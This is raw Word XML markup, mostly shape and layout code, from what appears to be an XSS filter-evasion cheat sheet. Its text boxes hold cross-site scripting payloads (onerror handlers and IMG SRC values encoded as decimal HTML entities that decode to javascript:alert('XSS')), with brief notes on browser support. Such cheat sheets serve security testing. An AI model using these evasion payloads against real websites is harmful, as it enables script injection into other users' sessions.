                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 8761"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 8742 w 8761"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 8739 w 8761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761" h="183">
                                <a:moveTo>
                                  <a:pt x="873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739" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8742" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="87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" name="Text Box 135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onerror="&amp;#0000106&amp;#0000097&amp;#0000118&amp;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#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#00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50" o:spid="_x0000_s1086" style="width:438.05pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="876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">
                <v:shape id="Freeform 1352" o:spid="_x0000_s1087" style="position:absolute;width:8761;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="876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ZQF8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWrDQAyE74G+w6JCb826+SnFzSa0hUBPJXHyAMKr&#10;2CaWdvFuEvftq0MhN4kZzXxabUbuzZWG1AVx8DItwJDUwXfSODgets9vYFJG8dgHIQe/lGCzfpis&#10;sPThJnu6VrkxGiKpRAdtzrG0NtUtMaZpiCSqncLAmHUdGusHvGk493ZWFK+WsRNtaDHSV0v1ubqw&#10;Axsj7+rFZ8HN/MynKv10xy059/Q4fryDyTTmu/n/+tsr/nyp/PqNjm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WUBfEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m8739,182l21,182r-3,l,161r,-3l,21,21,,8739,r21,21l8760,161r-18,21l8739,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8739,182;21,182;18,182;0,161;0,158;0,21;21,0;8739,0;8760,21;8760,161;8742,182;8739,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1351" o:spid="_x0000_s1088" type="#_x0000_t202" style="position:absolute;width:876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KKQsQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y0tlRqziohCoVAa48HjmJ0k&#10;i9nZNLvV+O/dQqG3ebzPyVaDbcWFem8cK5hOEhDEpdOGawWHYvf0BsIHZI2tY1JwIw+r5eghw1S7&#10;K+d02YdaxBD2KSpoQuhSKX3ZkEU/cR1x5CrXWwwR9rXUPV5juG3lc5LMpEXDsaHBjjYNlef9j1Ww&#10;PnK+Nd+fp6+8yk1RzBP+mJ2VehwP6wWIQEP4F/+533Wc//I6hd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CikL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onerror="&amp;#0000106&amp;#0000097&amp;#0000118&amp;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#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#00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1"/>
        <w:rPr>
          <w:sz w:val="7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5563235" cy="116205"/>
                <wp:effectExtent l="5715" t="3810" r="3175" b="3810"/>
                <wp:docPr id="1346" name="Group 1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3235" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8761" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1347" name="Freeform 13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custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 8761"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 8761"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 8761"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 8761"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 8761"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 8761"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 8742 w 8761"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 8739 w 8761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761" h="183">
                                <a:moveTo>
                                  <a:pt x="873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739" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8742" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="87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" name="Text Box 134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00058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#000003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47" o:spid="_x0000_s1089" style="width:438.05pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="876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">
                <v:shape id="Freeform 1349" o:spid="_x0000_s1090" style="position:absolute;width:8761;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="876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ZevsAA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPzWrCQBC+F3yHZQRvdWOVKtFVVBB6Eo0+wJAdk2Bm&#10;dsluNX37bkHobT6+31ltem7Vg7rQODEwGWegSEpnG6kMXC+H9wWoEFEstk7IwA8F2KwHbyvMrXvK&#10;mR5FrFQKkZCjgTpGn2sdypoYw9h5ksTdXMcYE+wqbTt8pnBu9UeWfWrGRlJDjZ72NZX34psNaO/5&#10;VM52GVfTO9+KcGyuBzJmNOy3S1CR+vgvfrm/bJo/nc3h75t0gl7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yZevsAAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" path="m8739,182l21,182r-3,l,161r,-3l,21,21,,8739,r21,21l8760,161r-18,21l8739,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8739,182;21,182;18,182;0,161;0,158;0,21;21,0;8739,0;8760,21;8760,161;8742,182;8739,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1348" o:spid="_x0000_s1091" type="#_x0000_t202" style="position:absolute;width:876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G1AscA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vDMAzF74N9B6NBb6uzP5Qtq1vK2KBQGE2yQ49q&#10;rCamsZzFbpt9++lQ2E3iPb3303w5+k6daYgusIGHaQaKuA7WcWPgu/q8fwEVE7LFLjAZ+KUIy8Xt&#10;zRxzGy5c0LlMjZIQjjkaaFPqc61j3ZLHOA09sWiHMHhMsg6NtgNeJNx3+jHLZtqjY2losaf3lupj&#10;efIGVjsuPtzP135bHApXVa8Zb2ZHYyZ34+oNVKIx/Zuv12sr+E/PgivfyAh6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htQLHAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACM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00058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#000003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1"/>
        <w:rPr>
          <w:sz w:val="6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687070" cy="116205"/>
                <wp:effectExtent l="5715" t="3810" r="2540" b="3810"/>
                <wp:docPr id="1343" name="Group 1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070" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1082" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1344" name="Freeform 13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82" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 1060 w 1082"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 1082"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 1082"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 1082"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 1082"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 1082"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 1082"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 1060 w 1082"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 1081 w 1082"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 1081 w 1082"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 1063 w 1082"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 1060 w 1082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082" h="183">
                                <a:moveTo>
                                  <a:pt x="106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060" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1081" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1081" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1063" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106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" name="Text Box 134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9&amp;#0000041"&gt;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44" o:spid="_x0000_s1092" style="width:54.1pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="108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">
                <v:shape id="Freeform 1346" o:spid="_x0000_s1093" style="position:absolute;width:1082;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="108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+S8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYYTeatYqZdkaRQsWoR5a66W3YTO7&#10;WdxMliSua3+9KRS8zeN9zmI12Fb05EPjWMF0koEgLp1uuFZw/N4+5SBCRNbYOiYFVwqwWo4eFlho&#10;d+Ev6g+xFimEQ4EKTIxdIWUoDVkME9cRJ65y3mJM0NdSe7ykcNvK5yx7kRYbTg0GO3ozVJ4OZ6ug&#10;tu8bu/2ocrM/ov89f/b57KdS6nE8rF9BRBriXfzv3uk0fzafw9836QS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DfkvEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1060,182l21,182r-3,l,161r,-3l,21,21,,1060,r21,21l1081,161r-18,21l1060,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1060,182;21,182;18,182;0,161;0,158;0,21;21,0;1060,0;1081,21;1081,161;1063,182;1060,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1345" o:spid="_x0000_s1094" type="#_x0000_t202" style="position:absolute;width:108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AanMQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+C/0PyxR6000fiqauIlJBEKQxHjxOs2Oy&#10;mJ2N2a2m/94VhN7m43vOdN7ZWlyo9caxgtdBAoK4cNpwqWCfr/pjED4ga6wdk4I/8jCfPfWmmGp3&#10;5Ywuu1CKGMI+RQVVCE0qpS8qsugHriGO3NG1FkOEbSl1i9cYbmv5liQjadFwbKiwoWVFxWn3axUs&#10;Dpx9mfP25zs7ZibPJwlvRielXp67xSeIQF34Fz/cax3nv38M4f5NPEH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gGpz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9&amp;#0000041"&gt;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4"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:t>Decimal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References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="134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101" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154"/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4134485</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="262890" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1340" name="Group 1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890" cy="116205"/>
                          <a:chOff x="6511" y="107"/>
                          <a:chExt cx="414" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1341" name="Freeform 1343"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6510" y="107"/>
                            <a:ext cx="414" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6903 6511"/>
                              <a:gd name="T1" fmla="*/ T0 w 414"/>
                              <a:gd name="T2" fmla="+- 0 289 107"/>
                              <a:gd name="T3" fmla="*/ 289 h 183"/>
                              <a:gd name="T4" fmla="+- 0 6532 6511"/>
                              <a:gd name="T5" fmla="*/ T4 w 414"/>
                              <a:gd name="T6" fmla="+- 0 289 107"/>
                              <a:gd name="T7" fmla="*/ 289 h 183"/>
                              <a:gd name="T8" fmla="+- 0 6529 6511"/>
                              <a:gd name="T9" fmla="*/ T8 w 414"/>
                              <a:gd name="T10" fmla="+- 0 289 107"/>
                              <a:gd name="T11" fmla="*/ 289 h 183"/>
                              <a:gd name="T12" fmla="+- 0 6511 6511"/>
                              <a:gd name="T13" fmla="*/ T12 w 414"/>
                              <a:gd name="T14" fmla="+- 0 268 107"/>
                              <a:gd name="T15" fmla="*/ 268 h 183"/>
                              <a:gd name="T16" fmla="+- 0 6511 6511"/>
                              <a:gd name="T17" fmla="*/ T16 w 414"/>
                              <a:gd name="T18" fmla="+- 0 265 107"/>
                              <a:gd name="T19" fmla="*/ 265 h 183"/>
                              <a:gd name="T20" fmla="+- 0 6511 6511"/>
                              <a:gd name="T21" fmla="*/ T20 w 414"/>
                              <a:gd name="T22" fmla="+- 0 128 107"/>
                              <a:gd name="T23" fmla="*/ 128 h 183"/>
                              <a:gd name="T24" fmla="+- 0 6532 6511"/>
                              <a:gd name="T25" fmla="*/ T24 w 414"/>
                              <a:gd name="T26" fmla="+- 0 107 107"/>
                              <a:gd name="T27" fmla="*/ 107 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6903 6511"/>
                              <a:gd name="T29" fmla="*/ T28 w 414"/>
                              <a:gd name="T30" fmla="+- 0 107 107"/>
                              <a:gd name="T31" fmla="*/ 107 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6924 6511"/>
                              <a:gd name="T33" fmla="*/ T32 w 414"/>
                              <a:gd name="T34" fmla="+- 0 128 107"/>
                              <a:gd name="T35" fmla="*/ 128 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6924 6511"/>
                              <a:gd name="T37" fmla="*/ T36 w 414"/>
                              <a:gd name="T38" fmla="+- 0 268 107"/>
                              <a:gd name="T39" fmla="*/ 268 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6906 6511"/>
                              <a:gd name="T41" fmla="*/ T40 w 414"/>
                              <a:gd name="T42" fmla="+- 0 289 107"/>
                              <a:gd name="T43" fmla="*/ 289 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6903 6511"/>
                              <a:gd name="T45" fmla="*/ T44 w 414"/>
                              <a:gd name="T46" fmla="+- 0 289 107"/>
                              <a:gd name="T47" fmla="*/ 2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4" h="183">
                                <a:moveTo>
                                  <a:pt x="392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92" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="413" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="413" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="39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2" name="Text Box 1342"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6510" y="107"/>
                            <a:ext cx="41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9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&lt;IMG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41" o:spid="_x0000_s1095" style="position:absolute;left:0;text-align:left;margin-left:325.55pt;margin-top:5.35pt;width:20.7pt;height:9.15pt;z-index:15746560;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="6511,107" coordsize="41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">
                <v:shape id="Freeform 1343" o:spid="_x0000_s1096" style="position:absolute;left:6510;top:107;width:414;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="41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t8yMYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBCF78L+hzALe7OprshSjbIrikUEWfXgcWjG&#10;tthMShNt/fdGELzN8N735s103plK3KhxpWUFgygGQZxZXXKu4HhY9X9AOI+ssbJMCu7kYD776E0x&#10;0bblf7rtfS5CCLsEFRTe14mULivIoItsTRy0s20M+rA2udQNtiHcVHIYx2NpsORwocCaFgVll/3V&#10;hBrX7f2Qttt6+LfeLBfHU+o3u5FSX5/d7wSEp86/zS861YH7Hg3g+U0YQc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t8yMYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m392,182r-371,l18,182,,161r,-3l,21,21,,392,r21,21l413,161r-18,21l392,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="392,289;21,289;18,289;0,268;0,265;0,128;21,107;392,107;413,128;413,268;395,289;392,289" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1342" o:spid="_x0000_s1097" type="#_x0000_t202" style="position:absolute;left:6510;top:107;width:41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mC6MQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxS86aZapKZZRUoLQqE0xoPHMTtJ&#10;FrOzaXbV+O/dQqG3ebzPydaDbcWFem8cK3iaJiCIS6cN1wr2xcfkBYQPyBpbx6TgRh7Wq4dRhql2&#10;V87psgu1iCHsU1TQhNClUvqyIYt+6jriyFWutxgi7Gupe7zGcNvKWZIspEXDsaHBjt4aKk+7s1Ww&#10;OXD+bn6+jt95lZuiWCb8uTgpNX4cNq8gAg3hX/zn3uo4f/48g99v4gl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Jguj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9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&lt;IMG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All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examples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javascript:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>directive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>inside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an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37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Gecko</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mode).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="101"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>tag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work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Firefox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Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>8.1+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num="2" w:space="708" w:equalWidth="0">
            <w:col w:w="5053" w:space="297"/>
            <w:col w:w="3670"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="14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5509260" cy="116205"/>
                <wp:effectExtent l="5715" t="5715" r="0" b="1905"/>
                <wp:docPr id="1337" name="Group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9260" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8676" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1338" name="Freeform 13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76" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8654 w 8676"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 8676"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 8676"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 8676"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 8676"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 8676"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 8676"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 8654 w 8676"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 8675 w 8676"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 8675 w 8676"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 8657 w 8676"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 8654 w 8676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676" h="183">
                                <a:moveTo>
                                  <a:pt x="865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54" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8675" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8675" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8657" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="865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" name="Text Box 133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67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8"/>
                                  <w:sz w:val="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SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#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38" o:spid="_x0000_s1098" style="width:433.8pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="867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">
                <v:shape id="Freeform 1340" o:spid="_x0000_s1099" style="position:absolute;width:8676;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="86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PVjMYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPzW7CQAyE70h9h5Ur9YLKpkWtqsCC+KvEsYGKs8ma&#10;JErWm2a3EN4eH5C42ZrxzOfpvHeNOlMXKs8G3kYJKOLc24oLA7/779cvUCEiW2w8k4ErBZjPngZT&#10;TK2/cEbnXSyUhHBI0UAZY5tqHfKSHIaRb4lFO/nOYZS1K7Tt8CLhrtHvSfKpHVYsDSW2tCopr3f/&#10;zkD+Uw/3h7/aheN6EzfrarnKPjJjXp77xQRUpD4+zPfrrRX88Vhw5RsZQc9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PVjMYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m8654,182l21,182r-3,l,161r,-3l,21,21,,8654,r21,21l8675,161r-18,21l8654,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8654,182;21,182;18,182;0,161;0,158;0,21;21,0;8654,0;8675,21;8675,161;8657,182;8654,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1339" o:spid="_x0000_s1100" type="#_x0000_t202" style="position:absolute;width:867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tj5MMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMMLeNFVBtBpFFhcWhMVaD3ucbcY2&#10;2Ey6TVbrv98Igrd5vM9ZbTpbiyu13jhWMB4lIIgLpw2XCk75x3AOwgdkjbVjUnAnD5t1v7fCVLsb&#10;Z3Q9hlLEEPYpKqhCaFIpfVGRRT9yDXHkzq61GCJsS6lbvMVwW8tJksykRcOxocKG3isqLsc/q2D7&#10;zdnO/H79HLJzZvJ8kfB+dlHqbdBtlyACdeElfro/dZw/nS7g8U08Qa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tj5M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78"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 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SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#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1"/>
        <w:rPr>
          <w:sz w:val="6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1867535" cy="116205"/>
                <wp:effectExtent l="5715" t="5715" r="3175" b="1905"/>
                <wp:docPr id="1334" name="Group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7535" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2941" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1335" name="Freeform 13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941" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 2919 w 2941"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 2941"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 2941"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 2941"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 2941"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 2941"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 2941"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 2919 w 2941"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 2940 w 2941"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 2940 w 2941"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 2922 w 2941"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 2919 w 2941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941" h="183">
                                <a:moveTo>
                                  <a:pt x="291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919" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2940" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2940" y="161"/>
                                </a:lnTo>
